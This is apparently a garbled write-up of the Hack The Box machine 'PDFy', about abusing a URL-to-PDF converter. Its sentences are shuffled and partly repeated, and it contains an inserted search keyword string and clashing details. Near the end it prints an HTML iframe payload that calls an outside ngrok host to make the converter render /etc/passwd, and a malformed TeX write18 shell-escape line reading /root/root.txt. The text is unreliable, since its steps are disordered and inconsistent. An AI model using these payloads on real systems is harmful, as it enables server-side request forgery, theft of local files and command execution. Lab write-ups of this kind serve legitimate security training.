This revealed several open ports, with notable services including an HTTP server running on port 80 and a PDF-related service on port 8080.
The exploitation path usually pivots on identifying the specific tool generating the PDFs.
The box typically starts with a standard web server running a simple web application. The core functionality allows a user to input a URL or upload a file to generate a PDF.
We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite , we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities. pdfy htb writeup upd
Now that you've mastered PDFy, you're equipped to identify and exploit similar vulnerabilities in other environments. The next time you see a "Convert to PDF" button, you'll know exactly where to look. Happy hacking!
Once you successfully render /etc/passwd , you have confirmed the LFI/SSRF vulnerability.
Upon reading config.php , we discover potential hardcoded credentials or a path to a web shell. In this scenario, we find the application allows uploading files, which we can leverage. 4. Gaining Initial Foothold This revealed several open ports, with notable services
The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:
Visiting the website on port 80 reveals a simple webpage with a link to a PDF file.
The uploaded PDF file can be used to execute arbitrary code on the system. The core functionality allows a user to input
<!DOCTYPE html> <html lang="en"> <body> <iframe src="http://0.tcp.us-cal-1.ngrok.io:19086/axura.php?x=/etc/passwd" style="height:1000px;width:1000px"></iframe> </body> </html>
A web application that converts provided URLs into PDF documents. Vulnerability: Insecure URL handling during PDF generation.
\write18cat /root/root.txt
Inside pdftex shell: